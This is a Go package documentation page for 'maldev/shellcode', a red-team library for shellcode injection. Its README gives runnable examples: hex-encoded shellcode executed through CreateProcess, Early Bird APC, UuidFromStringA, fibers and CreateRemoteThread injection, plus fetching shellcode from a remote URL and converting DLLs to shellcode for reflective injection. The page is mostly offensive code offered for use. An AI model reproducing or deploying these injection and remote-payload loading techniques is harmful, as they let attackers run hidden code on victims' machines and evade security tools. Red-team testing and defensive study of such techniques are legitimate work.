shellcode

package
v0.1.4 Latest Latest
Warning

This package is not in the latest version of its module.

 Go to latest Published: Aug 29, 2023 License: MIT Imports: 6 Imported by: 0

README

Shellcode Examples

  • This package provides useful functions to help red teamers with shellcode injection

* Have in mind that a lot of errors have not been handled in shellcode injection techniques because they usually throws false errors. However it should work as expected

All Shellcode Injection Techniques

package main

import (
  "log"
  "encoding/hex"

  "github.com/D3Ext/maldev/shellcode"
)

func main(){
  calc_shellcode, _ := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3")

  err := shellcode.CreateProcess(calc_shellcode)
  if err != nil {
    log.Fatal(err)
  }

  err = shellcode.EarlyBirdApc(calc_shellcode)
  if err != nil {
    log.Fatal(err)
  }

  err = shellcode.UuidFromStringA(calc_shellcode)
  if err != nil {
    log.Fatal(err)
  }

  err = shellcode.Fibers(calc_shellcode) // This technique doesn't exit until process ends
  if err != nil {
    log.Fatal(err)
  }

  err = shellcode.CreateRemoteThread(calc_shellcode) // This technique doesn't exit until process ends
  if err != nil {
    log.Fatal(err)
  }
}

Get shellcode from file

package main

import (
  "log"

  "github.com/D3Ext/maldev/shellcode"
)

func main(){
  shellcode_to_exec, err := shellcode.GetShellcodeFromFile("./shellcode.bin") // func GetShellcodeFromFile(filename string) []byte {}
  if err != nil {
    log.Fatal(err)
  }
  fmt.Println(shellcode_to_exec)
}

Get shellcode from remote url

package main

import (
  "log"

  "github.com/D3Ext/maldev/shellcode"
)

func main(){
  shellcode_to_exec, err := shellcode.GetShellcodeFromUrl("http://192.168.1.6/shellcode.bin") // func GetShellcodeFromUrl(url string) []byte {}
  if err != nil {
    log.Fatal(err)
  }
  fmt.Println(shellcode_to_exec)
}

Convert DLL to shellcode

  • This function is really useful to perform a sRDI (shellcode Reflective DLL Injection). It autodetects between x86 and x64 architecture
package main

import (
  "log"

  "github.com/D3Ext/maldev/shellcode"
)

func main(){
  err := shellcode.ConvertDllToShellcode("example.dll", "functionName", "") // func ConvertDllToShellcode(dll_file string, function_name string, args string) ([]byte, error) {}
  if err != nil {
    log.Fatal(err)
  }
}

Documentation

Index

Constants

This section is empty.

Variables

This section is empty.

Functions

func ConvertBytes added in v0.1.2 

func ConvertBytes(dllBytes, functionHash, userData []byte) []byte

func ConvertDllToShellcode added in v0.1.2 

func ConvertDllToShellcode(dll_file string, func_name string, data string) ([]byte, error)

func GetShellcodeFromFile 

func GetShellcodeFromFile(file string) ([]byte, error)

func GetShellcodeFromUrl 

func GetShellcodeFromUrl(sc_url string) ([]byte, error)

func WriteShellcodeToFile added in v0.1.2 

func WriteShellcodeToFile(filename string, shellcode []byte) error

Types

This section is empty.

Source Files

View all Source files

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL
go.dev uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic. Learn more.